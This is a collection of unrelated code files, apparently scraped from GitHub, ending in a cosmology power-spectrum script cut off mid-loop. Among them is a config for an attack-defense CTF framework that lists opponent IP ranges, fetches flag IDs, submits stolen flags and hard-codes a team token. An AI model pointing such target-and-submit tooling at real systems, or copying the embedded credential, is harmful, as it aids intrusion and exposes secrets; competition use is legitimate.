+{"seq_id":"71639298687","text":"import ast\nfrom collections import defaultdict\nfrom typing import DefaultDict, List, Union\n\nfrom typing_extensions import final\n\nfrom wemake_python_styleguide import constants\nfrom wemake_python_styleguide.logic.nodes import get_parent\nfrom wemake_python_styleguide.logic.tree.functions import is_method\nfrom wemake_python_styleguide.types import (\n AnyFunctionDef,\n AnyImport,\n ConfigurationOptions,\n)\nfrom wemake_python_styleguide.violations import complexity\nfrom wemake_python_styleguide.violations.base import ErrorCallback\nfrom wemake_python_styleguide.visitors.base import BaseNodeVisitor\nfrom wemake_python_styleguide.visitors.decorators import alias\n\n_ConditionNodes = Union[ast.If, ast.While, ast.IfExp]\n_ModuleMembers = Union[AnyFunctionDef, ast.ClassDef]\n\n\n@final\n@alias('visit_module_members', (\n 'visit_ClassDef',\n 'visit_AsyncFunctionDef',\n 'visit_FunctionDef',\n))\nclass ModuleMembersVisitor(BaseNodeVisitor):\n \"\"\"Counts classes and functions in a module.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates a counter for tracked metrics.\"\"\"\n super().__init__(*args, **kwargs)\n self._public_items_count = 0\n\n def visit_module_members(self, node: _ModuleMembers) -> None:\n \"\"\"\n Counts the number of _ModuleMembers in a single module.\n\n Raises:\n TooManyModuleMembersViolation\n\n \"\"\"\n self._check_decorators_count(node)\n self._check_members_count(node)\n self.generic_visit(node)\n\n def _check_members_count(self, node: _ModuleMembers) -> None:\n \"\"\"This method increases the number of module members.\"\"\"\n is_real_method = is_method(getattr(node, 'function_type', None))\n\n if isinstance(get_parent(node), ast.Module) and not is_real_method:\n self._public_items_count += 1\n\n def _check_decorators_count(self, node: _ModuleMembers) -> None:\n number_of_decorators = len(node.decorator_list)\n if number_of_decorators > self.options.max_decorators:\n self.add_violation(\n complexity.TooManyDecoratorsViolation(\n node,\n text=str(number_of_decorators),\n baseline=self.options.max_decorators,\n ),\n )\n\n def _post_visit(self) -> None:\n if self._public_items_count > self.options.max_module_members:\n self.add_violation(\n complexity.TooManyModuleMembersViolation(\n text=str(self._public_items_count),\n baseline=self.options.max_module_members,\n ),\n )\n\n\n@final\nclass _ImportFromMembersValidator(object):\n \"\"\"Validator of ``ast.ImportFrom`` nodes names.\"\"\"\n\n def __init__(\n self,\n error_callback: ErrorCallback,\n options: ConfigurationOptions,\n ) -> None:\n self._error_callback = error_callback\n self._options = options\n\n def validate(self, node: ast.ImportFrom) -> None:\n self._check_import_from_names_count(node)\n\n def _check_import_from_names_count(self, node: ast.ImportFrom) -> None:\n imported_names_number = len(node.names)\n if imported_names_number > self._options.max_import_from_members:\n self._error_callback(\n complexity.TooManyImportedModuleMembersViolation(\n node,\n text=str(imported_names_number),\n baseline=self._options.max_import_from_members,\n ),\n )\n\n\n@final\nclass ImportMembersVisitor(BaseNodeVisitor):\n \"\"\"Counts imports in a module.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates a counter for tracked metrics.\"\"\"\n super().__init__(*args, **kwargs)\n self._imports_count = 0\n self._imported_names_count = 0\n self._import_from_members_validator = _ImportFromMembersValidator(\n self.add_violation,\n self.options,\n )\n\n def visit_Import(self, node: ast.Import) -> None:\n \"\"\"\n Counts the number of ``import``.\n\n Raises:\n TooManyImportedNamesViolation\n TooManyImportsViolation\n\n \"\"\"\n self._visit_any_import(node)\n\n def visit_ImportFrom(self, node: ast.ImportFrom) -> None:\n \"\"\"\n Counts the number of ``from ... import ...``.\n\n Raises:\n TooManyImported_ModuleMembersViolation\n TooManyImportedNamesViolation\n TooManyImportsViolation\n\n \"\"\"\n self._import_from_members_validator.validate(node)\n self._visit_any_import(node)\n\n def _visit_any_import(self, node: AnyImport) -> None:\n self._imports_count += 1\n self._imported_names_count += len(node.names)\n self.generic_visit(node)\n\n def _check_imports_count(self) -> None:\n if self._imports_count > self.options.max_imports:\n self.add_violation(\n complexity.TooManyImportsViolation(\n text=str(self._imports_count),\n baseline=self.options.max_imports,\n ),\n )\n\n def _check_imported_names_count(self) -> None:\n if self._imported_names_count > self.options.max_imported_names:\n self.add_violation(\n complexity.TooManyImportedNamesViolation(\n text=str(self._imported_names_count),\n baseline=self.options.max_imported_names,\n ),\n )\n\n def _post_visit(self) -> None:\n self._check_imports_count()\n self._check_imported_names_count()\n\n\n@final\nclass ConditionsVisitor(BaseNodeVisitor):\n \"\"\"Checks booleans for condition counts.\"\"\"\n\n def visit_BoolOp(self, node: ast.BoolOp) -> None:\n \"\"\"\n Counts the number of conditions.\n\n Raises:\n TooManyConditionsViolation\n\n \"\"\"\n self._check_conditions(node)\n self.generic_visit(node)\n\n def visit_Compare(self, node: ast.Compare) -> None:\n \"\"\"\n Counts the number of compare parts.\n\n Raises:\n TooLongCompareViolation\n\n \"\"\"\n self._check_compares(node)\n self.generic_visit(node)\n\n def _count_conditions(self, node: ast.BoolOp) -> int:\n counter = 0\n for condition in node.values:\n if isinstance(condition, ast.BoolOp):\n counter += self._count_conditions(condition)\n else:\n counter += 1\n return counter\n\n def _check_conditions(self, node: ast.BoolOp) -> None:\n conditions_count = self._count_conditions(node)\n if conditions_count > constants.MAX_CONDITIONS:\n self.add_violation(\n complexity.TooManyConditionsViolation(\n node,\n text=str(conditions_count),\n baseline=constants.MAX_CONDITIONS,\n ),\n )\n\n def _check_compares(self, node: ast.Compare) -> None:\n is_all_equals = all(isinstance(op, ast.Eq) for op in node.ops)\n is_all_notequals = all(isinstance(op, ast.NotEq) for op in node.ops)\n can_be_longer = is_all_notequals or is_all_equals\n\n threshold = constants.MAX_COMPARES\n if can_be_longer:\n threshold += 1\n\n if len(node.ops) > threshold:\n self.add_violation(\n complexity.TooLongCompareViolation(\n node,\n text=str(len(node.ops)),\n baseline=threshold,\n ),\n )\n\n\n@final\nclass ElifVisitor(BaseNodeVisitor):\n \"\"\"Checks the number of ``elif`` cases inside conditions.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates internal ``elif`` counter.\"\"\"\n super().__init__(*args, **kwargs)\n self._if_children: DefaultDict[ast.If, List[ast.If]] = defaultdict(\n list,\n )\n\n def visit_If(self, node: ast.If) -> None:\n \"\"\"\n Checks condition not to reimplement switch.\n\n Raises:\n TooManyElifsViolation\n\n \"\"\"\n self._check_elifs(node)\n self.generic_visit(node)\n\n def _get_root_if_node(self, node: ast.If) -> ast.If:\n for root, children in self._if_children.items():\n if node in children:\n return root\n return node\n\n def _update_if_child(self, root: ast.If, node: ast.If) -> None:\n if node is not root:\n self._if_children[root].append(node)\n self._if_children[root].extend(node.orelse) # type: ignore\n\n def _check_elifs(self, node: ast.If) -> None:\n has_elif = all(\n isinstance(if_node, ast.If) for if_node in node.orelse\n )\n\n if has_elif:\n root = self._get_root_if_node(node)\n self._update_if_child(root, node)\n\n def _post_visit(self):\n for root, children in self._if_children.items():\n real_children_length = len(set(children))\n if real_children_length > constants.MAX_ELIFS:\n self.add_violation(\n complexity.TooManyElifsViolation(\n root,\n text=str(real_children_length),\n baseline=constants.MAX_ELIFS,\n ),\n )\n\n\n@final\nclass TryExceptVisitor(BaseNodeVisitor):\n \"\"\"Visits all try/except nodes to ensure that they are not too complex.\"\"\"\n\n def visit_Try(self, node: ast.Try) -> None:\n \"\"\"\n Ensures that try/except is correct.\n\n Raises:\n TooManyExceptCasesViolation\n TooLongTryBodyViolation\n\n \"\"\"\n self._check_except_count(node)\n self._check_try_body_length(node)\n self.generic_visit(node)\n\n def _check_except_count(self, node: ast.Try) -> None:\n if len(node.handlers) > constants.MAX_EXCEPT_CASES:\n self.add_violation(\n complexity.TooManyExceptCasesViolation(\n node,\n text=str(len(node.handlers)),\n baseline=constants.MAX_EXCEPT_CASES,\n ),\n )\n\n def _check_try_body_length(self, node: ast.Try) -> None:\n if len(node.body) > self.options.max_try_body_length:\n self.add_violation(\n complexity.TooLongTryBodyViolation(\n node,\n text=str(len(node.body)),\n baseline=self.options.max_try_body_length,\n ),\n )\n\n\n@final\nclass YieldTupleVisitor(BaseNodeVisitor):\n \"\"\"Finds too long ``tuples`` in ``yield`` expressions.\"\"\"\n\n def visit_Yield(self, node: ast.Yield) -> None:\n \"\"\"\n Helper to get all ``yield`` nodes in a function at once.\n\n Raises:\n TooLongYieldTupleViolation\n\n \"\"\"\n self._check_yield_values(node)\n self.generic_visit(node)\n\n def _check_yield_values(self, node: ast.Yield) -> None:\n if isinstance(node.value, ast.Tuple):\n if len(node.value.elts) > constants.MAX_LEN_YIELD_TUPLE:\n self.add_violation(\n complexity.TooLongYieldTupleViolation(\n node,\n text=str(len(node.value.elts)),\n baseline=constants.MAX_LEN_YIELD_TUPLE,\n ),\n )\n","repo_name":"edwarda7/Wemake-Python-Styleguide","sub_path":"wemake_python_styleguide/visitors/ast/complexity/counts.py","file_name":"counts.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"29475977333","text":"from django import forms\nfrom . import models\n\nclass CreateArticle(forms.ModelForm):\n\n #define quais campos de modelos a minha aplicação vai utilizar\n class Meta:\n model = models.Article\n fields = [\n 'title',\n 'body',\n 'slug',\n 'thumb'\n ]\n","repo_name":"lucaslima18/django-blog","sub_path":"django_blog/articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30720927814","text":"from time import sleep\n\ndef contador(i, f, p):\n inicio = i\n final = f\n if p < 0:\n p *= -1\n print(f'Contagem de {i} até {f} de {p} em {p}:')\n if f > i:\n while inicio <= f:\n print(f'{inicio}', end=' ')\n inicio += p\n sleep(.5)\n sleep(.5)\n print('FIM!')\n print('-' * 30)\n else:\n while inicio >= f:\n print(f'{inicio}', end=' ')\n inicio -= p\n sleep(.5)\n sleep(.5)\n print('FIM!')\n print('-' * 30)\n\ncontador(1,10,1)\ncontador(10,0,2)\n\nprint('Agora é a sua vez de personalizar a contagem!')\ni = int(input('Inicio: '))\nf = int(input('Final: '))\np = int(input('Passo: '))\ncontador(i,f,p)\n","repo_name":"igorzfrank/Cursos","sub_path":"Curso em Video/python/PytonExercicios/ex098-funcaoContador.py","file_name":"ex098-funcaoContador.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71144382176","text":"#!/usr/bin/python3\n\"\"\"print square\"\"\"\n\n\ndef print_square(size):\n \"\"\"this function that prints a square with #\"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n if type(size) is not float and size < 0:\n raise TypeError(\"size must be an integer\")\n for i in range(size):\n print(\"#\" * size)\n","repo_name":"stevengm45/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30809087180","text":"import datetime\n\nit_test = True\n\n\n# Обертки сервисов\nclass Wrapper1C:\n def __init__(self, name_object, object_to_serial):\n\n value = \"\"\n if name_object == \"ПлатежноеПоручение\":\n name_object_type = Operation.get_name_type_payment(self, object_to_serial)\n if name_object_type == \"in\":\n value_object = PaymentOrderIn(object_to_serial)\n elif name_object_type == \"out\":\n value_object = PaymentOrderOut(object_to_serial)\n else:\n value_object = {\"value\": \"\"}\n value = value_object.value\n else:\n value_object = \"\"\n if value != \"\":\n self.value = {\n \"#type\": value_object.typeObject1C + \".\" + value_object.nameType,\n \"#value\": value\n }\n else:\n self.value = \"\"\n\n\nclass WrapperTinkoff:\n def __init__(self, name_object, object_to_serial):\n if name_object == \"Operation\":\n pass\n self.value = \"\"\n\n\n# Объекты внешних ИС\nclass Operation:\n def __init__(self, operation_type):\n self.operationType = operation_type\n self.kbk = \"kbk_test\"\n self.payerInn = \"payerInn\"\n self.payerKpp = \"payerKpp\"\n self.payerName = \"payerName\"\n self.amount = 123\n self.recipient = \"test\",\n self.recipientInn = \"test\",\n self.recipientKpp = \"test\",\n self.payerAccount = \"test\",\n self.payerCorrAccount = \"test\",\n self.payerBank = \"test\",\n self.payerBic = \"test\",\n self.recipientAccount = \"test\",\n self.recipientCorrAccount = \"test\",\n self.recipientBank = \"test\",\n self.recipientBic = \"test\",\n self.id = \"123\",\n self.paymentType = \"test\",\n self.uin = \"test\",\n self.creatorStatus = \"test\",\n self.oktmo = \"test\",\n self.taxEvidence = \"test\",\n self.taxPeriod = \"test\",\n self.taxDocNumber = \"test\",\n self.taxDocDate = \"test\",\n self.taxType = \"test\",\n self.executionOrder = \"test\"\n\n @staticmethod\n def get_name_type_payment(self, operation):\n if operation.operationType == \"\":\n return \"in\"\n else:\n return \"out\"\n\n\n# Объекты платформы 1С\nclass Object1c():\n def __init__(self):\n self.value = {\n \"Ref\": \"00000000-0000-0000-0000-000000000000\",\n \"DeletionMark\": False\n }\n self.nameType = \"te\"\n self.typeObject1C = \"\"\n\n\nclass Document1c(Object1c):\n def __init__(self):\n Object1c.__init__(self)\n self.value.update({\n \"Date\": str(datetime.datetime.now()),\n \"Number\": \"\",\n \"Posted\": False\n })\n self.nameType = \"\"\n self.typeObject1C = \"jcfg:DocumentObject\"\n\n\n# Объекты метаданных 1С\nclass PaymentOrder(Document1c):\n def __init__(self, operation):\n Document1c.__init__(self)\n self.value.update({\n \"ВалютаДокумента\": get_link_object_1c(self, \"currency\",\n {\"КодВалюты\": 643}),\n \"ВидОперации\": operation.operationType,\n \"Контрагент\": get_link_object_1c(self, \"client\",\n {\"ИНН\": operation.payerInn,\n \"КПП\": operation.payerKpp,\n \"Наименование\": operation.payerName}),\n \"Организация\": get_link_object_1c(self, \"company\",\n {\"Наименование\": operation.recipient,\n \"ИНН\": operation.recipientInn,\n \"КПП\": operation.recipientKpp}),\n \"Ответственный\": \"\",\n \"ОтражатьВБухгалтерскомУчете\": True,\n \"ОтражатьВНалоговомУчете\": True,\n \"ОтраженоВОперУчете\": True,\n \"Подразделение\": \"\",\n \"Комментарий\": operation.id,\n \"СуммаДокумента\": operation.amount,\n \"СчетКонтрагента\": get_link_object_1c(self, \"clientAccount\",\n {\"НомерСчета\": operation.payerAccount,\n \"КорСчет\": operation.payerCorrAccount,\n \"БАНК\": operation.payerBank,\n \"БИК\": operation.payerBic}),\n \"СчетОрганизации\": get_link_object_1c(self, \"companyAccount\",\n {\"НомерСчета\": operation.recipientAccount,\n \"КорСчет\": operation.recipientCorrAccount,\n \"БАНК\": operation.recipientBank,\n \"БИК\": operation.recipientBic}),\n })\n\n @staticmethod\n def get_name_type_payment(self, document_1C):\n if document_1C.nameType == \"jcfg:DocumentObject.ПлатежноеПоручениеВходящее\":\n return \"in\"\n else:\n return \"out\"\n\n @staticmethod\n def set_value(self, document_1C, name_value, value):\n document_1C.value.update({name_value: value})\n\n\nclass PaymentOrderIn(PaymentOrder):\n def __init__(self, operation):\n PaymentOrder.__init__(self, operation)\n self.value.update({'ППВ': operation.kbk})\n self.nameType = \"ПлатежноеПоручениеВходящее\"\n\n\nclass PaymentOrderOut(PaymentOrder):\n def __init__(self, operation):\n PaymentOrder.__init__(self, operation)\n\n self.nameType = \"ПлатежноеПоручениеИсходящее\"\n parameters_request = {\"Номер\": operation.recipient,\n \"Дата\": operation.recipientInn}\n link_1c = get_link_object_1c(self, \"PayOut\", parameters_request)\n if link_1c == \"\":\n self.value.update({'КодКБК': operation.kbk})\n\n\n# Получение ссылок из 1С\ndef get_link_object_1c(self, object_1c, parameters_request):\n request_1c = \"\"\n\n if it_test:\n body_request = {\"request_1c\": request_1c, \"parameters_request\": parameters_request}\n return body_request\n\n if object_1c == \"client\":\n template = 'SELECT value FROM z_keyvalue WHERE key=:key'\n parameters = {'key': 'CLIENT_REQUEST'}\n request_1c = session.execute(template, parameters).fetchall()\n if object_1c == \"PayOut\":\n template = 'SELECT value FROM z_keyvalue WHERE key=:key'\n parameters = {'key': 'PAYOUT_REQUEST'}\n request_1c = session.execute(template, parameters).fetchall()\n else:\n request_1c = \"\"\n body_request = {\"request_1c\": request_1c, \"parameters_request\": parameters_request}\n\n conn = outgoing.plain_http['mak01.outconn'].conn\n dl_period = 1 # in days\n\n params = body_request\n response = conn.get(self.cid, params=params)\n if response.status_code != 200:\n return \"\"\n else:\n data_base = response.json()\n return data_base.link\n\n\n# Тесты\noperation_test = Operation(\"test_value\")\ntestWrapper = Wrapper1C(\"ПлатежноеПоручение\", operation_test)\nprint(testWrapper.value)\n","repo_name":"GlebNSK/ESB_Intagration","sub_path":"payment_orders.py","file_name":"payment_orders.py","file_ext":"py","file_size_in_byte":7638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28657676200","text":"import json\nimport requests\n\nfrom ataka.common.flag_status import FlagStatus\n\n### EXPORTED CONFIG\n\n# Ataka Host Domain / IP\nATAKA_HOST = \"ataka.h4xx.eu\"\n\n# Default targets for atk runlocal\nRUNLOCAL_TARGETS = [\n # NOP Team\n \"10.60.0.1\",\n \"10.61.0.1\",\n \"10.62.0.1\",\n \"10.63.0.1\",\n \"10.60.1.1\",\n \"10.61.1.1\",\n \"10.62.1.1\",\n \"10.63.1.1\",\n \"10.60.7.1\",\n \"10.61.7.1\",\n \"10.62.7.1\",\n \"10.63.7.1\",\n]\n\n# IPs that are always excluded from attacks. These can be included in runlocal with --ignore-exclusions\n# These still get targets with flag ids, they're just never (automatically) attacked\nSTATIC_EXCLUSIONS = {\"10.60.5.1\", \"10.61.5.1\", \"10.62.5.1\", \"10.63.5.1\"}\n\nROUND_TIME = 120\n\n# format: regex, group where group 0 means the whole regex\nFLAG_REGEX = r\"[A-Z0-9]{31}=\", 0\n\n# Maximum list length for submit_flags()\nFLAG_BATCHSIZE = 2500\n\n# Minimum wait in seconds between each call of submit_flags()\nFLAG_RATELIMIT = 5\n\n# When the CTF starts\nSTART_TIME = 1689490800 + 1 # Sun Jul 16 2023 09:00:00 GMT+0200 (Central European Summer Time)\n\n### END EXPORTED CONFIG\n\n\nTEAM_TOKEN = \"45f8890e6c13d864527c1e869ca384d0\"\nSUBMIT_URL = \"http://10.10.0.1:8080/flags\"\nFLAGID_URL = \"http://10.10.0.1:8081/flagIds\"\n\n\ndef get_targets():\n services = [\"CyberUni_1\", \"CyberUni_2\", \"CyberUni_3\", \"CyberUni_4\",\n \"ClosedSea-1\", \"ClosedSea-2\", \"Trademark\", \"rpn\"]\n\n ## TODO: fill\n default_targets = {\n \"rpn\":\n {f\"10.60.{i}.1\": [] for i in range(10)},\n \"CyberUni_1\":\n {f\"10.61.{i}.1\": [] for i in range(10)},\n \"CyberUni_2\":\n {f\"10.61.{i}.1\": [] for i in range(10)},\n \"Trademark\":\n {f\"10.62.{i}.1\": [] for i in range(10)},\n }\n ## A generic solution for just a single vulnbox:\n # default_targets = {service: {f\"10.62.{i}.1\": [] for i in range(10)} for service in services}\n\n flag_ids = requests.get(FLAGID_URL).json()\n\n targets = {\n service: [\n {\n \"ip\": ip,\n \"extra\": json.dumps(ip_info),\n }\n for ip, ip_info in (default_targets[service] | service_info).items()\n ]\n for service, service_info in ({service: [] for service in services} | flag_ids).items()\n }\n\n return targets\n\n\ndef submit_flags(flags):\n resp = requests.put(\n SUBMIT_URL, headers={\"X-Team-Token\": TEAM_TOKEN}, json=flags\n ).json()\n\n results = []\n for flag_resp in resp:\n msg = flag_resp[\"msg\"]\n if flag_resp[\"status\"]:\n status = FlagStatus.OK\n elif \"invalid flag\" in msg:\n status = FlagStatus.INVALID\n elif \"flag from nop team\" in msg:\n status = FlagStatus.INACTIVE\n elif \"flag is your own\" in msg:\n status = FlagStatus.OWNFLAG\n elif \"flag too old\" in msg or \"flag is too old\" in msg:\n status = FlagStatus.INACTIVE\n elif \"flag already claimed\" in msg:\n status = FlagStatus.DUPLICATE\n else:\n status = FlagStatus.ERROR\n print(f\"Got error while flagsubmission: {msg}\")\n results.append(status)\n\n return results\n","repo_name":"OpenAttackDefenseTools/ataka","sub_path":"ataka/ctfconfig/iccdemo.py","file_name":"iccdemo.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"33"} +{"seq_id":"17320297385","text":"import os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\n# import matplotlib.animation\nimport pandas as pd\nimport argparse\n# import pdb\nfrom munch import Munch\nimport tables\n\nimport camb\nfrom camb import model, initialpower\n\nfrom gadget_tools import Snapshot\nfrom field_tools import compute_power_spec\n# from fitting_fns import halofit\nfrom time import time\n\nt_now = time()\n\nparser = argparse.ArgumentParser(\n description='Density field evolution from Gadget simulation.',\n usage= 'python ./visualize_simulation.py')\n\nparser.add_argument('--simdir', default='/scratch/cprem/sims/', type=str, help='Directory path for all simulations')\n\nparser.add_argument('--simname', type=str, default='bdm_cdm1024', help='Directory name containing the saved data')\nparser.add_argument('--cosmo', type=str, default='P18', help='cosmology parameters data from')\nparser.add_argument('--rundirs', type=str, default='r1',\n help='Directory name containing the snapshot binaries')\n\nparser.add_argument('--plots_into', type=str, default='/mnt/home/student/cprem/cosmo-sims/sanity_checks/plots/')\n\nparser.add_argument('--snap_i_list', type=str, default=list(range(50,201,50)), help='Snapshot index number')\n\nparser.add_argument('--light_snaps', type=int, default=1, help='save white bg images for pdf notes')\n\nargs = parser.parse_args()\n\ngrid_size = 1024\nscheme = 'TSC'\n# rundir = 'r1'\ninterlaced = True\n\ninlcd_str = '_interlaced' if interlaced==True else ''\n\nif args.light_snaps:\n theme = '_light'\n plt.style.use('default')\n # plt.set_cmap('nipy_spectral')\nelse:\n theme = ''\n plt.style.use('dark_background')\n # plt.set_cmap('nipy_spectral')\n\n# simname = 'bdm_cdm1024' if args.simname is None else args.simname\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nschemes = ['NGP', 'CIC', 'TSC']\np = schemes.index(scheme) + 1\n\nrundirs = args.rundirs.split(' ')\n\nrundir = rundirs[0]\nrundir_str = rundir.replace('/', '_') + '-' + rundirs[-1].split('/')[-1] if len(rundirs)>1 else rundir.replace('/', '_')\n\n\nplotsdir = os.path.join(args.plots_into, f'{args.simname:s}', f'matter_pk')\nos.makedirs(plotsdir, exist_ok=True)\n\nsnapdir = os.path.join(args.simdir, args.simname, rundir, 'snaps')\n\ndef snapfilen_prefix(snapdirectory, snap_i):\n if os.path.exists(os.path.join(snapdir, f'snapdir_{0:03d}')):\n return os.path.join(snapdir, 'snapdir_{0:03d}/snapshot_{0:03d}'.format(snap_i))\n else:\n return os.path.join(snapdir, 'snapshot_{0:03d}'.format(snap_i))\n\ndef snapfilen(snapdirectory, snap_i):\n snapfilen_prefix_i = snapfilen_prefix(snapdirectory, snap_i)\n if os.path.exists(snapfilen_prefix_i) or os.path.exists(f'{snapfilen_prefix_i:s}.hdf5'):\n return snapfilen_prefix_i\n else:\n return snapfilen_prefix_i + '.0'\n\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n# cosmology = 'P18' if args.simname=='bdm_cdm1024' else 'WMAP7'\nif args.cosmo =='P18':\n cos_par_vals = (0.3063375, 0.6936625, 0.0484103, 0.6781, 0.9677, 0.815)\nelif args.cosmo=='WMAP7':\n cos_par_vals = (0.276, 0.724, 0.045, 0.7, 0.961, 0.811)\nelif args.cosmo=='lh1':\n cos_par_vals = (0.3391, 0.6609, 0.05172, 0.6682, 0.9931, 0.8162)\nelif args.cosmo=='lh2':\n cos_par_vals = (0.3503, 0.6497, 0.0505, 0.7522, 0.9703, 0.7802)\nelif args.cosmo=='lh6':\n cos_par_vals = (0.3279, 0.6721, 0.04743, 0.6178, 0.9399, 0.8282)\n\ncos_pars = Munch()\ncos_pars.Om0, cos_pars.Ode0, cos_pars.Ob0, cos_pars.h, cos_pars.ns, cos_pars.sig8 = cos_par_vals\ncos_pars.Ombh2 = (cos_pars.Ob0)*cos_pars.h**2\ncos_pars.Omch2 = (cos_pars.Om0-cos_pars.Ob0)*cos_pars.h**2\n\nprint(args.cosmo, vars(cos_pars))\n\ndef Omega(z, Om0):\n E = Om0 * (1+z)**3 + (1-Om0)\n return Om0 * (1+z)**3 / E\n\ndef D1(z, Om0):\n Om_m = Omega(z, Om0)\n Om_L = 1 - Om_m\n return 5/2* 1/(1+z) * Om_m / (Om_m**(4/7) - Om_L + (1+Om_m/2)*(1+Om_L/70))\n\ndef adjust_lightness(color, amount=0.5):\n # This function from stack for creating lighter or darker versions of matplotlib color\n import matplotlib.colors as mc\n import colorsys\n try:\n c = mc.cnames[color]\n except:\n c = color\n c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n return colorsys.hls_to_rgb(c[0], max(0, min(1, amount * c[1])), c[2])\n\ndef lighter(color): return adjust_lightness(color, 1.5)\n\ndef darker(color): return adjust_lightness(color, 0.7)\n\n\n# i_list = list(range(50,201,50))\n# i_list = [0,1]\n\ni_list = [int(x) for x in args.snap_i_list.split(',')]\ni_list.sort()\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nsnap = Snapshot(snapfilen(snapdir, 0), snapfrmt='gadget4')\n\nbox_size = snap.box_size\nk_nyq = np.pi * grid_size / box_size\nk_start = 2* np.pi / box_size\n\nredshifts=[]\nfor i in i_list:\n snap = Snapshot(snapfilen(snapdir, i), snapfrmt='gadget4')\n redshifts.append(snap.redshift)\n\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\npars_camb = camb.CAMBparams()\npars_camb.set_cosmology(H0=cos_pars.h*100, ombh2=cos_pars.Ombh2, omch2=cos_pars.Omch2)\npars_camb.InitPower.set_params(ns=cos_pars.ns)\n#Note non-linear corrections couples to smaller scales than we want\npars_camb.set_matter_power(redshifts=redshifts, kmax=10*k_nyq)\n\n#Linear spectra\npars_camb.NonLinear = model.NonLinear_none\npars_camb.NonLinearModel.set_params(halofit_version='takahashi')\nresults_camb = camb.get_results(pars_camb)\nkh_camb, z_camb, pk_camb = results_camb.get_matter_power_spectrum(minkh=2e-7, maxkh=100, npoints = 1000)\n# s8 = np.array(results.get_sigma8())\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n#Non-Linear spectra (Halofit)\npars_camb.NonLinear = model.NonLinear_both\nresults_camb.calc_power_spectra(pars_camb)\nkh_camb_nonlin, z_camb_nonlin, pk_camb_nonlin = results_camb.get_matter_power_spectrum(minkh=k_start*0.8, maxkh=1.2*k_nyq, npoints = 200)\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n\nfig1, ax2 = plt.subplots(1, figsize=(7.5,7), dpi=150)\nplt.rcParams['lines.linewidth'] = 1\n\n# ax2.plot([],[], ' ', label=f\"Scheme-{scheme}, Grid-size: {grid_size:d}\")\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nfor index, i in enumerate(i_list[::-1]):\n # t_bef, t_now = t_now, time()\n # print(t_now - t_bef)\n color=next(ax2._get_lines.prop_cycler)['color']\n\n k_full = kh_camb\n pk_lin = pk_camb[index]\n\n\n ax2.plot(k_full, pk_lin, color=color, linestyle=(0, (1, 1)), zorder=3)\n ax2.set_xscale('log')\n ax2.set_yscale('log')\n\n\n ax2.plot(kh_camb_nonlin, pk_camb_nonlin[index], linestyle='solid', color=darker(color), zorder=1)\n\n # pk_fit = halofit.NonLinPowerSpecCDM(Omega(snap.redshift, snap.Omega_m_0))\n # pk_fit.set_Del2L_interpolate(k_full, pk_lin)\n # pk_fit.compute_params(param_from='smith')\n # print(vars(pk_fit))\n # ax2.plot(kh_camb_nonlin, pk_fit.P(kh_camb_nonlin), linestyle='solid', color=darker(color), zorder=2)\n\n lin_bin = np.linspace(np.sqrt(k_start*k_nyq),k_nyq, 50)\n log_bin = np.logspace(np.log10(k_start),np.log10(np.sqrt(k_start*k_nyq)/1.2), 15)\n # merge_bin = np.concatenate([lin_bin,log_bin])\n # merge_bin.sort()power_spec['k'].iloc[1]\n merge_bin = np.union1d(lin_bin, log_bin)\n\n\n # power_spec_grouped1 = power_spec.groupby(pd.cut(power_spec['k'], bins=lin_bin)).mean()\n # ax2.plot(power_spec_grouped1['k'],power_spec_grouped1['Pk'], color=color, linestyle='dashed', label=f\"{scheme:s} scheme without interlacing\")[0]\n \n # if interlaced:\n \n power_spec_all = None\n\n for rundir in rundirs:\n snapdir = os.path.join(args.simdir, args.simname, rundir, 'snaps')\n snap = Snapshot(snapfilen(snapdir, i), snapfrmt='gadget4')\n savesdir = os.path.join(args.simdir, args.simname, rundir)\n print(savesdir)\n dens_griddir = os.path.join(savesdir,'meshgrid')\n Pkdir = os.path.join(savesdir,'power_spectrum')\n\n os.makedirs(Pkdir, exist_ok=True)\n\n pk_filepath = os.path.join(Pkdir, f'{scheme:s}_{grid_size:d}{inlcd_str}_{i:03d}.csv' )\n \n h5file = tables.open_file( os.path.join(dens_griddir, f'{scheme:s}_{grid_size:d}_{i:03d}.hdf5'), 'r' )\n\n if interlaced:\n power_spec_this = compute_power_spec(h5file.root.PartType1.density,snap.box_size, interlace_with_FX=h5file.root.PartType1.density_shifted, Win_correct_scheme=scheme, grid_size=grid_size)\n\n else:\n power_spec_this = compute_power_spec(h5file.root.PartType1.density,snap.box_size, interlace_with_FX=None, Win_correct_scheme=scheme, grid_size=grid_size)\n\n power_spec_this_grp = power_spec_this.groupby(pd.cut(power_spec_this['k'], bins=merge_bin)).mean()\n power_spec_this_grp.to_csv(pk_filepath, sep='\\t', index=False, float_format='%.8e', header=['k (h/Mpc)', 'P(k) (Mpc/h)^3'])\n\n 